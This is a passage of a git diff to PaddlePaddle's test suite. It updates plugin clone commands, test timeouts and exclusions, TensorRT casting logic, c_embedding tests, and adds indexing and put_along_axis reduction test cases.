             os.getenv('PLUGIN_TAG'),
+            os.getenv('PLUGIN_TAG'),
             sys.executable,
         )
         os.system(cmd)
diff --git a/test/custom_runtime/test_custom_cpu_profiler_plugin.py b/test/custom_runtime/test_custom_cpu_profiler_plugin.py
index 220c9a0a21aeb1..aeebec9e342c32 100644
--- a/test/custom_runtime/test_custom_cpu_profiler_plugin.py
+++ b/test/custom_runtime/test_custom_cpu_profiler_plugin.py
@@ -24,7 +24,7 @@ def setUp(self):
         cur_dir = os.path.dirname(os.path.abspath(__file__))
         self.temp_dir = tempfile.TemporaryDirectory()
         cmd = 'cd {} \
-            && git clone --depth 1 {} \
+            && git clone --depth 1 {} -b {} \
             && cd PaddleCustomDevice \
             && git fetch origin \
             && git checkout {} -b dev \
@@ -33,6 +33,7 @@ def setUp(self):
             self.temp_dir.name,
             os.getenv('PLUGIN_URL'),
             os.getenv('PLUGIN_TAG'),
+            os.getenv('PLUGIN_TAG'),
             sys.executable,
         )
         os.system(cmd)
diff --git a/test/custom_runtime/test_custom_cpu_to_static.py b/test/custom_runtime/test_custom_cpu_to_static.py
index 60ba27004afbdd..55181cc017440f 100644
--- a/test/custom_runtime/test_custom_cpu_to_static.py
+++ b/test/custom_runtime/test_custom_cpu_to_static.py
@@ -106,7 +106,7 @@ def setUp(self):
         cur_dir = os.path.dirname(os.path.abspath(__file__))
         self.temp_dir = tempfile.TemporaryDirectory()
         cmd = 'cd {} \
-            && git clone --depth 1 {} \
+            && git clone --depth 1 {} -b {} \
             && cd PaddleCustomDevice \
             && git fetch origin \
             && git checkout {} -b dev \
@@ -115,6 +115,7 @@ def setUp(self):
             self.temp_dir.name,
             os.getenv('PLUGIN_URL'),
             os.getenv('PLUGIN_TAG'),
+            os.getenv('PLUGIN_TAG'),
             sys.executable,
         )
         os.system(cmd)
diff --git a/test/custom_runtime/test_custom_op_setup.py b/test/custom_runtime/test_custom_op_setup.py
index 47c7d9821d6b8e..2086b3ac6f2ed1 100644
--- a/test/custom_runtime/test_custom_op_setup.py
+++ b/test/custom_runtime/test_custom_op_setup.py
@@ -104,7 +104,7 @@ def setUp(self):
         self.cur_dir = os.path.dirname(os.path.abspath(__file__))
         self.temp_dir = tempfile.TemporaryDirectory()
         cmd = 'cd {} \
-            && git clone --depth 1 {} \
+            && git clone --depth 1 {} -b {} \
             && cd PaddleCustomDevice \
             && git fetch origin \
             && git checkout {} -b dev \
@@ -114,6 +114,7 @@ def setUp(self):
             self.temp_dir.name,
             os.getenv('PLUGIN_URL'),
             os.getenv('PLUGIN_TAG'),
+            os.getenv('PLUGIN_TAG'),
             sys.executable,
             self.cur_dir,
         )
diff --git a/test/custom_runtime/test_fleet_launch_custom_device.sh b/test/custom_runtime/test_fleet_launch_custom_device.sh
index cc851558462399..5cbb3a11d14220 100644
--- a/test/custom_runtime/test_fleet_launch_custom_device.sh
+++ b/test/custom_runtime/test_fleet_launch_custom_device.sh
@@ -18,7 +18,7 @@ set -e
 
 temp_dir=$(mktemp --directory)
 pushd ${temp_dir} \
-&& git clone --depth 1 ${PLUGIN_URL} \
+&& git clone --depth 1 ${PLUGIN_URL} -b ${PLUGIN_TAG} \
 && pushd PaddleCustomDevice/ \
 && git fetch origin \
 && git checkout ${PLUGIN_TAG} -b dev \
diff --git a/test/dygraph_to_static/CMakeLists.txt b/test/dygraph_to_static/CMakeLists.txt
index e2ce58b7cf58c2..bdb9f182e46ada 100644
--- a/test/dygraph_to_static/CMakeLists.txt
+++ b/test/dygraph_to_static/CMakeLists.txt
@@ -8,6 +8,9 @@ set(SOT_ENVS SOT_LOG_LEVEL=0 COST_MODEL=False MIN_GRAPH_SIZE=0
 set(GC_ENVS FLAGS_eager_delete_tensor_gb=0.0)
 
 list(REMOVE_ITEM TEST_OPS test_lac)
+list(REMOVE_ITEM TEST_OPS test_grad) # disable test_grad on release/2.6
+list(REMOVE_ITEM TEST_OPS test_sentiment
+)# disable test_sentiment on release/2.6
 # NOTE(Aurelius84): In case of Windows CI, if open ON_INFER, RWLOCK of Scope
 # will be removed and will cause some random failed in multi-thread.
 if(WITH_PYTHON)
@@ -28,6 +31,9 @@ if(NOT WITH_GPU)
   # disable some model test on CPU to avoid timeout
   list(REMOVE_ITEM TEST_OPS test_resnet)
   list(REMOVE_ITEM TEST_OPS test_build_strategy)
+  list(REMOVE_ITEM TEST_OPS test_bert)
+  list(REMOVE_ITEM TEST_OPS test_transformer)
+  list(REMOVE_ITEM TEST_OPS test_mobile_net)
 endif()
 
 foreach(TEST_OP ${TEST_OPS})
@@ -37,15 +43,11 @@ endforeach()
 set_tests_properties(test_se_resnet PROPERTIES TIMEOUT 900)
 set_tests_properties(test_yolov3 PROPERTIES TIMEOUT 900 LABELS
                                             "RUN_TYPE=EXCLUSIVE")
-set_tests_properties(test_mobile_net PROPERTIES TIMEOUT 120)
 set_tests_properties(test_seq2seq PROPERTIES TIMEOUT 420)
 set_tests_properties(test_cycle_gan PROPERTIES TIMEOUT 150)
-set_tests_properties(test_bert PROPERTIES TIMEOUT 180)
 set_tests_properties(test_basic_api_transformation PROPERTIES TIMEOUT 240)
 set_tests_properties(test_reinforcement_learning PROPERTIES TIMEOUT 120)
-set_tests_properties(test_transformer PROPERTIES TIMEOUT 200)
 set_tests_properties(test_bmn PROPERTIES TIMEOUT 300)
-set_tests_properties(test_bert PROPERTIES TIMEOUT 240)
 
 if(NOT WIN32)
   set_tests_properties(test_tsm PROPERTIES TIMEOUT 900)
@@ -53,12 +55,14 @@ endif()
 
 if(APPLE)
   set_tests_properties(test_bmn PROPERTIES TIMEOUT 300)
-  set_tests_properties(test_mobile_net PROPERTIES TIMEOUT 300)
 endif()
 
 if(WITH_GPU)
   set_tests_properties(test_train_step_resnet18_sgd PROPERTIES TIMEOUT 240)
   set_tests_properties(test_train_step_resnet18_adam PROPERTIES TIMEOUT 240)
+  set_tests_properties(test_bert PROPERTIES TIMEOUT 240)
+  set_tests_properties(test_transformer PROPERTIES TIMEOUT 240)
+  set_tests_properties(test_mobile_net PROPERTIES TIMEOUT 240)
 endif()
 
 # Legacy IR only tests for dygraph_to_static
diff --git a/test/dygraph_to_static/test_list.py b/test/dygraph_to_static/test_list.py
index 52db0e53eb6255..ef3d195d90805d 100644
--- a/test/dygraph_to_static/test_list.py
+++ b/test/dygraph_to_static/test_list.py
@@ -292,6 +292,7 @@ def init_dygraph_func(self):
             test_list_pop_in_while_loop,
         ]
 
+    # TODO(zhangbo): Refine BuildOpFrom for op with sub_block
     def train(self, to_static=False):
         with base.dygraph.guard():
             if to_static:
diff --git a/test/dygraph_to_static/test_mobile_net.py b/test/dygraph_to_static/test_mobile_net.py
index 599d863d12c795..44cf791191a8de 100644
--- a/test/dygraph_to_static/test_mobile_net.py
+++ b/test/dygraph_to_static/test_mobile_net.py
@@ -19,7 +19,10 @@
 import unittest
 
 import numpy as np
-from dygraph_to_static_utils import Dy2StTestBase, test_pt_only
+from dygraph_to_static_utils import (
+    Dy2StTestBase,
+    test_pt_only,
+)
 from predictor_utils import PredictorTools
 
 import paddle
@@ -735,12 +738,6 @@ def assert_same_predict(self, model_name):
         )
 
     @test_pt_only
-    def test_mobile_net_pir(self):
-        # MobileNet-V1
-        self.assert_same_loss("MobileNetV1")
-        # MobileNet-V2
-        self.assert_same_loss("MobileNetV2")
-
     def test_mobile_net(self):
         # MobileNet-V1
         self.assert_same_loss("MobileNetV1")
diff --git a/test/indexing/test_getitem.py b/test/indexing/test_getitem.py
index f3a2374ecbe1d0..3959bde43d1528 100644
--- a/test/indexing/test_getitem.py
+++ b/test/indexing/test_getitem.py
@@ -233,6 +233,26 @@ def test_combined_index_11(self):
 
         np.testing.assert_allclose(y.numpy(), np_res)
 
+    def test_combined_index_12(self):
+        np_data = (
+            np.arange(3 * 4 * 5 * 6).reshape((3, 4, 5, 6)).astype(self.ndtype)
+        )
+
+        if self.dtype == 'bfloat16':
+            np_data = convert_uint16_to_float(convert_float_to_uint16(np_data))
+        if self.dtype == 'complex64' or self.dtype == 'complex128':
+            np_data = np_data + 1j * np_data
+
+        np_res = np_data[:, :, [2, 4], :]
+
+        x = paddle.to_tensor(np_data, dtype=self.dtype)
+        y = x[:, :, [2, 4], :]
+
+        if self.dtype == 'bfloat16':
+            y = paddle.cast(y, dtype='float32')
+
+        np.testing.assert_allclose(y.numpy(), np_res)
+
     def test_index_has_range(self):
         np_data = (
             np.arange(3 * 4 * 5 * 6).reshape((3, 4, 5, 6)).astype(self.ndtype)
@@ -970,6 +990,20 @@ def test_combined_index_11(self):
 
         np.testing.assert_allclose(res[0], np_res)
 
+    def test_combined_index_12(self):
+        np_data = np.arange(3 * 4 * 5 * 6).reshape((3, 4, 5, 6))
+        np_res = np_data[:, :, [2, 4], :]
+        with paddle.static.program_guard(
+            paddle.static.Program(), paddle.static.Program()
+        ):
+            x = paddle.to_tensor(np_data)
+            y = _getitem_static(
+                x, (slice(None), slice(None), [2, 4], slice(None))
+            )
+            res = self.exe.run(fetch_list=[y])
+
+        np.testing.assert_allclose(res[0], np_res)
+
     def test_index_has_range(self):
         # only one bool tensor with all False
         np_data = np.arange(3 * 4 * 5 * 6).reshape((3, 4, 5, 6))
diff --git a/test/indexing/test_setitem.py b/test/indexing/test_setitem.py
index b8d7e3361efc45..0f0bdf3d08b8da 100644
--- a/test/indexing/test_setitem.py
+++ b/test/indexing/test_setitem.py
@@ -28,6 +28,21 @@ def setUp(self):
         self.ndtype = np.float64
         self.dtype = 'float64'
 
+    def test_advanced_index(self):
+        np_data = np.zeros((3, 4, 5, 6), dtype='float32').astype(self.ndtype)
+        if self.dtype == 'bfloat16':
+            np_data = convert_uint16_to_float(convert_float_to_uint16(np_data))
+        if self.dtype == 'complex64' or self.dtype == 'complex128':
+            np_data = np_data + 1j * np_data
+
+        x = paddle.to_tensor(np_data, dtype=self.dtype)
+        np_data[[0, 1], [1, 2], [1]] = 10.0
+        x[[0, 1], [1, 2], [1]] = 10.0
+
+        if self.dtype == 'bfloat16':
+            x = paddle.cast(x, dtype='float32')
+        np.testing.assert_allclose(x.numpy(), np_data)
+
     def test_combined_index_1(self):
         np_data = np.zeros((3, 4, 5, 6), dtype='float32').astype(self.ndtype)
         if self.dtype == 'bfloat16':
@@ -228,6 +243,54 @@ def test_indexing_is_boolean_false(self):
 
         np.testing.assert_allclose(x.numpy(), np_data)
 
+    def test_combined_indexing_and_value_is_tensor_2(self):
+        # value is tensor needed to broadcast and index will be adjusted
+        np_data = np.ones((3, 4, 5, 6)).astype(self.ndtype)
+        value_data = np.arange(3 * 4 * 2 * 1).reshape((3, 4, 2, 1))
+
+        if self.dtype == 'bfloat16':
+            np_data = convert_uint16_to_float(convert_float_to_uint16(np_data))
+            value_data = convert_uint16_to_float(
+                convert_float_to_uint16(value_data)
+            )
+        if self.dtype == 'complex64' or self.dtype == 'complex128':
+            np_data = np_data + 1j * np_data
+            value_data = value_data + 1j * value_data
+
+        x = paddle.to_tensor(np_data, dtype=self.dtype)
+        v = paddle.to_tensor(value_data, dtype=self.dtype)
+        x[..., [1, 4], ::2] = v
+
+        np_data[..., [1, 4], ::2] = value_data
+        if self.dtype == 'bfloat16':
+            x = paddle.cast(x, dtype='float32')
+        np.testing.assert_allclose(x.numpy(), np_data)
+
+    def test_combined_indexing_and_value_is_tensor_3(self):
+        # value is tensor and index will be adjusted
+        # and the value rank is less than original tensor
+        np_data = np.ones((3, 4, 5, 6)).astype(self.ndtype)
+        value_data = np.arange(2 * 3 * 5).reshape((2, 3, 5))
+
+        if self.dtype == 'bfloat16':
+            np_data = convert_uint16_to_float(convert_float_to_uint16(np_data))
+            value_data = convert_uint16_to_float(
+                convert_float_to_uint16(value_data)
+            )
+        if self.dtype == 'complex64' or self.dtype == 'complex128':
+            np_data = np_data + 1j * np_data
+            value_data = value_data + 1j * value_data
+
+        x = paddle.to_tensor(np_data, dtype=self.dtype)
+        v = paddle.to_tensor(value_data, dtype=self.dtype)
+        x[:, [1, 3], :, [3, 4]] = v
+
+        np_data[:, [1, 3], :, [3, 4]] = value_data
+
+        if self.dtype == 'bfloat16':
+            x = paddle.cast(x, dtype='float32')
+        np.testing.assert_allclose(x.numpy(), np_data)
+
     def test_inplace_with_stride(self):
         np_v = np.random.randn(3, 1).astype(self.ndtype)
         if self.dtype == 'bfloat16':
@@ -242,12 +305,12 @@ def test_inplace_with_stride(self):
         zero.stop_gradient = False
 
         zero1 = zero * 1
-        zero1[paddle.to_tensor([0, 1])] = vv
+        zero1[1, paddle.to_tensor([2, 0, 1])] = vv
 
         loss = zero1.sum()
         loss.backward()
 
-        expected_v_grad = np.ones((3, 1)) * 10.0
+        expected_v_grad = np.ones((3, 1)) * 5.0
         if self.dtype == 'bfloat16':
             np.testing.assert_allclose(
                 v.grad.cast('float32').numpy(), expected_v_grad
@@ -574,6 +637,69 @@ def test_indexing_is_boolean_false(self):
 
         np.testing.assert_allclose(res[0], np_data)
 
+    def test_combined_indexing_and_value_is_tensor_1(self):
+        # value is tensor with same shape to getitem and index will be adjusted
+        np_data = np.ones((3, 3), dtype='int32')
+        value_data = np.array([-1, -1, -1])
+        np_data[:, [0, 2]] = np_data[:, [0, 2]] * np.expand_dims(value_data, -1)
+        with paddle.static.program_guard(
+            paddle.static.Program(), paddle.static.Program()
+        ):
+            x = paddle.ones((3, 3), dtype='int32')
+            v = paddle.to_tensor([-1, -1, -1])
+            y = _setitem_static(
+                x,
+                (slice(None), [0, 2]),
+                x[:, [0, 2]] * v.unsqueeze(-1),
+            )
+            res = self.exe.run(fetch_list=[y])
+
+        np.testing.assert_allclose(res[0], np_data)
+
+    def test_combined_indexing_and_value_is_tensor_2(self):
+        # value is tensor needed to broadcast and index will be adjusted
+        np_data = np.ones((3, 4, 5, 6), dtype='int32')
+        value_data = np.arange(3 * 4 * 2 * 1).reshape((3, 4, 2, 1))
+        np_data[..., [1, 4], ::2] = value_data
+
+        with paddle.static.program_guard(
+            paddle.static.Program(), paddle.static.Program()
+        ):
+            x = paddle.ones((3, 4, 5, 6), dtype='int32')
+            v = paddle.arange(3 * 4 * 2 * 1).reshape((3, 4, 2, 1))
+
+            y = _setitem_static(
+                x,
+                (..., [1, 4], slice(None, None, 2)),
+                v,
+            )
+
+            res = self.exe.run(fetch_list=[y])
+
+        np.testing.assert_allclose(res[0], np_data)
+
+    def test_combined_indexing_and_value_is_tensor_3(self):
+        # value is tensor and index will be adjusted
+        # and the value rank is less than original tensor
+        np_data = np.ones((3, 4, 5, 6), dtype='int32')
+        value_data = np.arange(2 * 3 * 5).reshape((2, 3, 5))
+        np_data[:, [1, 3], :, [3, 4]] = value_data
+
+        with paddle.static.program_guard(
+            paddle.static.Program(), paddle.static.Program()
+        ):
+            x = paddle.ones((3, 4, 5, 6), dtype='int32')
+            v = paddle.arange(2 * 3 * 5).reshape((2, 3, 5))
+            y = _setitem_static(
+                x,
+                (slice(None), [1, 3], slice(None), [3, 4]),
+                v,
+            )
+
+            res = self.exe.run(fetch_list=[y])
+
+        np.testing.assert_allclose(res[0], np_data)
+
 
 if __name__ == '__main__':
     unittest.main()
diff --git a/test/ir/inference/program_config.py b/test/ir/inference/program_config.py
index a2f36617de8e6e..f9424502484ccb 100644
--- a/test/ir/inference/program_config.py
+++ b/test/ir/inference/program_config.py
@@ -275,6 +275,7 @@ def generate_weight():
         self.outputs = outputs
         self.input_type = input_type
         self.no_cast_list = [] if no_cast_list is None else no_cast_list
+        self.supported_cast_type = [np.float32, np.float16]
 
     def __repr__(self):
         log_str = ''
@@ -292,11 +293,9 @@ def __repr__(self):
         return log_str
 
     def set_input_type(self, _type: np.dtype) -> None:
-        assert _type in [
-            np.float32,
-            np.float16,
-            None,
-        ], "PaddleTRT only supports FP32 / FP16 IO"
+        assert (
+            _type in self.supported_cast_type or _type is None
+        ), "PaddleTRT only supports FP32 / FP16 IO"
 
         ver = paddle.inference.get_trt_compile_version()
         trt_version = ver[0] * 1000 + ver[1] * 100 + ver[2] * 10
@@ -309,15 +308,14 @@ def set_input_type(self, _type: np.dtype) -> None:
     def get_feed_data(self) -> Dict[str, Dict[str, Any]]:
         feed_data = {}
         for name, tensor_config in self.inputs.items():
-            do_casting = (
-                self.input_type is not None and name not in self.no_cast_list
-            )
+            data = tensor_config.data
             # Cast to target input_type
-            data = (
-                tensor_config.data.astype(self.input_type)
-                if do_casting
-                else tensor_config.data
-            )
+            if (
+                self.input_type is not None
+                and name not in self.no_cast_list
+                and data.dtype in self.supported_cast_type
+            ):
+                data = data.astype(self.input_type)
             # Truncate FP32 tensors to FP16 precision for FP16 test stability
             if data.dtype == np.float32 and name not in self.no_cast_list:
                 data = data.astype(np.float16).astype(np.float32)
@@ -334,10 +332,14 @@ def _cast(self) -> None:
         for name, inp in self.inputs.items():
             if name in self.no_cast_list:
                 continue
+            if inp.dtype not in self.supported_cast_type:
+                continue
             inp.convert_type_inplace(self.input_type)
         for name, weight in self.weights.items():
             if name in self.no_cast_list:
                 continue
+            if weight.dtype not in self.supported_cast_type:
+                continue
             weight.convert_type_inplace(self.input_type)
         return self
 
diff --git a/test/ir/inference/test_trt_convert_assign.py b/test/ir/inference/test_trt_convert_assign.py
index 55939982d5ee0d..99b027877bc9cb 100644
--- a/test/ir/inference/test_trt_convert_assign.py
+++ b/test/ir/inference/test_trt_convert_assign.py
@@ -120,9 +120,8 @@ def clear_dynamic_shape():
             self.dynamic_shape.opt_input_shape = {}
 
         def generate_trt_nodes_num(attrs, dynamic_shape):
-            if not dynamic_shape and (
-                self.has_bool_dtype or self.dims == 1 or self.dims == 0
-            ):
+            # Static shape does not support 0 or 1 dim's input
+            if not dynamic_shape and (self.dims == 1 or self.dims == 0):
                 return 0, 4
             return 1, 2
 
diff --git a/test/ir/inference/test_trt_convert_cast.py b/test/ir/inference/test_trt_convert_cast.py
index 026abc571050a2..0b5f2186429e3e 100644
--- a/test/ir/inference/test_trt_convert_cast.py
+++ b/test/ir/inference/test_trt_convert_cast.py
@@ -118,6 +118,7 @@ def generate_input(type):
                             )
                         },
                         outputs=["cast_output_data1"],
+                        no_cast_list=["input_data"],
                     )
 
                     yield program_config
diff --git a/test/ir/inference/test_trt_convert_lookup_table.py b/test/ir/inference/test_trt_convert_lookup_table.py
index e1fb64bcdf545f..b7cf7d657d7a02 100644
--- a/test/ir/inference/test_trt_convert_lookup_table.py
+++ b/test/ir/inference/test_trt_convert_lookup_table.py
@@ -80,6 +80,7 @@ def generate_input2(dims, attrs: List[Dict[str, Any]]):
                     )
                 },
                 outputs=["out_data"],
+                no_cast_list=["indices"],
             )
 
             yield program_config
diff --git a/test/ir/inference/test_trt_convert_solve.py b/test/ir/inference/test_trt_convert_solve.py
index c3f9b51d0d05c2..de70cfacc4e071 100644
--- a/test/ir/inference/test_trt_convert_solve.py
+++ b/test/ir/inference/test_trt_convert_solve.py
@@ -87,11 +87,10 @@ def clear_dynamic_shape():
         # for dynamic_shape
         generate_dynamic_shape(attrs)
         self.trt_param.precision = paddle_infer.PrecisionType.Float32
-        program_config.set_input_type(np.float32)
         yield self.create_inference_config(), (1, 3), 1e-5
+
         self.trt_param.precision = paddle_infer.PrecisionType.Half
-        program_config.set_input_type(np.float16)
-        yield self.create_inference_config(), (1, 3), 1e-3
+        yield self.create_inference_config(), (1, 3), (1e-3, 1e-3)
 
     def test(self):
         self.run_test()
diff --git a/test/legacy_test/CMakeLists.txt b/test/legacy_test/CMakeLists.txt
index 9c875f6755187a..0d54fa7ea37400 100644
--- a/test/legacy_test/CMakeLists.txt
+++ b/test/legacy_test/CMakeLists.txt
@@ -550,9 +550,9 @@ if((NOT WITH_GPU)
 endif()
 
 list(REMOVE_ITEM TEST_OPS "test_stride")
+list(REMOVE_ITEM TEST_OPS "test_graph_reindex")
 if(WITH_COVERAGE)
   list(REMOVE_ITEM TEST_OPS test_weight_decay)
-  list(REMOVE_ITEM TEST_OPS test_graph_reindex)
   list(REMOVE_ITEM TEST_OPS test_cuda_graphed_layer)
   list(REMOVE_ITEM TEST_OPS test_cuda_graph_partial_graph_static_run)
   list(REMOVE_ITEM DIST_TEST_OPS test_dist_fleet_geo)
diff --git a/test/legacy_test/c_embedding_op_base.py b/test/legacy_test/c_embedding_op_base.py
index 83758b6bb0bc98..cfb9df8e69d22d 100644
--- a/test/legacy_test/c_embedding_op_base.py
+++ b/test/legacy_test/c_embedding_op_base.py
@@ -34,10 +34,8 @@ def get_c_embedding(start, end, table, ids):
     return output
 
 
-def c_embedding_wrapper(table, index, start_index=0):
-    return paddle._legacy_C_ops.c_embedding(
-        table, index, "start_index", start_index
-    )
+def c_embedding_wrapper(table, index, start_index=0, vocab_size=-1):
+    return paddle._C_ops.c_embedding(table, index, start_index, vocab_size)
 
 
 class TestCEmbeddingCPU(OpTest):
@@ -58,11 +56,15 @@ def initcase(self):
         )
         self.start_index = 10
         self.end_index = self.start_index + 17
+        self.vocab_size = 34
 
         self.inputs = {'W': table, 'Ids': ids}
         np_out = get_c_embedding(self.start_index, self.end_index, table, ids)
         self.outputs = {'Out': np_out.reshape((2, 4, 64))}
-        self.attrs = {'start_index': self.start_index}
+        self.attrs = {
+            'start_index': self.start_index,
+            'vocab_size': self.vocab_size,
+        }
         if core.is_compiled_with_xpu():
             self.__class__.use_xpu = True
 
@@ -87,12 +89,20 @@ def test_check_output(self):
             self.check_output_with_place(core.CUDAPlace(0))
         elif core.is_compiled_with_xpu():
             self.check_output_with_place(core.XPUPlace(0))
+        else:
+            current_place = paddle.framework._current_expected_place()
+            if isinstance(current_place, paddle.CustomPlace):
+                self.check_output_with_place(current_place)
 
     def test_check_grad(self):
         if core.is_compiled_with_cuda():
             self.check_grad_with_place(core.CUDAPlace(0), ['W'], 'Out')
         elif core.is_compiled_with_xpu():
             self.check_grad_with_place(core.XPUPlace(0), ['W'], 'Out')
+        else:
+            current_place = paddle.framework._current_expected_place()
+            if isinstance(current_place, paddle.CustomPlace):
+                self.check_grad_with_place(current_place, ['W'], 'Out')
 
     def init_dtype(self):
         if core.is_compiled_with_cuda():
@@ -101,6 +111,11 @@ def init_dtype(self):
         elif core.is_compiled_with_xpu():
             self.dtype = "float32"
             self.ids_dtype = "int64"
+        else:
+            current_place = paddle.framework._current_expected_place()
+            if isinstance(current_place, paddle.CustomPlace):
+                self.dtype = "float32"
+                self.ids_dtype = "int64"
 
 
 class TestCEmbeddingOpFP32(TestCEmbeddingOpBase):
diff --git a/test/legacy_test/test_download.py b/test/legacy_test/test_download.py
index 742c4b2a651902..da25a3021a31e0 100644
--- a/test/legacy_test/test_download.py
+++ b/test/legacy_test/test_download.py
@@ -120,14 +120,6 @@ def test_retry_exception(
                 './test',
             )
 
-    def test_wget_download_error(
-        self,
-    ):
-        with self.assertRaises(RuntimeError):
-            from paddle.utils.download import _download
-
-            _download('www.baidu', './test', method='wget')
-
     def test_download_methods(
         self,
     ):
@@ -136,14 +128,9 @@ def test_download_methods(
             "https://paddle-hapi.bj.bcebos.com/unittest/files.zip",
         ]
 
-        import sys
-
         from paddle.utils.download import _download
 
-        if sys.platform == 'linux':
-            methods = ['wget', 'get']
-        else:
-            methods = ['get']
+        methods = ['get']
 
         for url in urls:
             for method in methods:
diff --git a/test/legacy_test/test_put_along_axis_op.py b/test/legacy_test/test_put_along_axis_op.py
index 43d2e80c25e24a..47cfc65d617136 100644
--- a/test/legacy_test/test_put_along_axis_op.py
+++ b/test/legacy_test/test_put_along_axis_op.py
@@ -120,6 +120,470 @@ def init_data(self):
         self.axis_type = "int64"
 
 
+class TestPutAlongAxisOpMul(TestPutAlongAxisOp):
+    def setUp(self):
+        self.init_data()
+        self.reduce_op = "mul"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] *= self.value[
+                        i, j, k
+                    ]
+        self.inputs = {
+            'Input': self.xnp,
+            'Index': self.index,
+            'Value': self.value,
+        }
+        self.attrs = {
+            'Axis': self.axis,
+            'Reduce': self.reduce_op,
+            'Include_self': True,
+            'broadcast': False,
+        }
+        self.outputs = {'Result': self.target}
+
+    def init_data(self):
+        self.dtype = 'float64'
+        self.x_type = "float64"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float64"
+        self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type)
+        self.index_type = "int64"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+
+
+class TestPutAlongAxisOpMulNotIncludeSelf(TestPutAlongAxisOp):
+    def setUp(self):
+        self.init_data()
+        self.reduce_op = "mul"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        self.nums = np.zeros_like(self.target)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    if self.nums[i, self.index[i, j, k], k] == 0:
+                        self.target[i, self.index[i, j, k], k] = self.value[
+                            i, j, k
+                        ]
+                    else:
+                        self.target[i, self.index[i, j, k], k] *= self.value[
+                            i, j, k
+                        ]
+                    self.nums[i, self.index[i, j, k], k] += 1
+        self.inputs = {
+            'Input': self.xnp,
+            'Index': self.index,
+            'Value': self.value,
+        }
+        self.attrs = {
+            'Axis': self.axis,
+            'Reduce': self.reduce_op,
+            'Include_self': False,
+            'broadcast': False,
+        }
+        self.outputs = {'Result': self.target}
+
+    def init_data(self):
+        self.dtype = 'float64'
+        self.x_type = "float64"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float64"
+        self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type)
+        self.index_type = "int64"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+
+
+class TestPutAlongAxisOpAdd(TestPutAlongAxisOp):
+    def setUp(self):
+        self.init_data()
+        self.reduce_op = "add"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] += self.value[
+                        i, j, k
+                    ]
+        self.inputs = {
+            'Input': self.xnp,
+            'Index': self.index,
+            'Value': self.value,
+        }
+        self.attrs = {
+            'Axis': self.axis,
+            'Reduce': self.reduce_op,
+            'Include_self': True,
+            'broadcast': False,
+        }
+        self.outputs = {'Result': self.target}
+
+    def init_data(self):
+        self.dtype = 'float64'
+        self.x_type = "float64"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float64"
+        self.value = np.random.randint(1, 100, (5, 5, 5)).astype(
+            self.value_type
+        )
+        self.index_type = "int64"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+
+
+class TestPutAlongAxisOpAddNotIncludeSelf(TestPutAlongAxisOp):
+    def setUp(self):
+        self.init_data()
+        self.reduce_op = "add"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        self.nums = np.zeros_like(self.target)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    if self.nums[i, self.index[i, j, k], k] == 0:
+                        self.target[i, self.index[i, j, k], k] = self.value[
+                            i, j, k
+                        ]
+                    else:
+                        self.target[i, self.index[i, j, k], k] += self.value[
+                            i, j, k
+                        ]
+                    self.nums[i, self.index[i, j, k], k] += 1
+        self.inputs = {
+            'Input': self.xnp,
+            'Index': self.index,
+            'Value': self.value,
+        }
+        self.attrs = {
+            'Axis': self.axis,
+            'Reduce': self.reduce_op,
+            'Include_self': False,
+            'broadcast': False,
+        }
+        self.outputs = {'Result': self.target}
+
+    def init_data(self):
+        self.dtype = 'float64'
+        self.x_type = "float64"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float64"
+        self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type)
+        self.index_type = "int64"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+
+
+class TestPutAlongAxisOpMean(TestPutAlongAxisOp):
+    def setUp(self):
+        self.init_data()
+        self.reduce_op = "mean"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        self.nums = np.ones_like(self.target)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] += self.value[
+                        i, j, k
+                    ]
+                    self.nums[i, self.index[i, j, k], k] += 1
+        for i in range(10):
+            for j in range(10):
+                for k in range(10):
+                    self.target[i, j, k] /= self.nums[i, j, k]
+        self.inputs = {
+            'Input': self.xnp,
+            'Index': self.index,
+            'Value': self.value,
+        }
+        self.attrs = {
+            'Axis': self.axis,
+            'Reduce': self.reduce_op,
+            'Include_self': True,
+            'broadcast': False,
+        }
+        self.outputs = {'Result': self.target}
+
+    def init_data(self):
+        self.dtype = 'float64'
+        self.x_type = "float64"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float64"
+        self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type)
+        self.index_type = "int64"
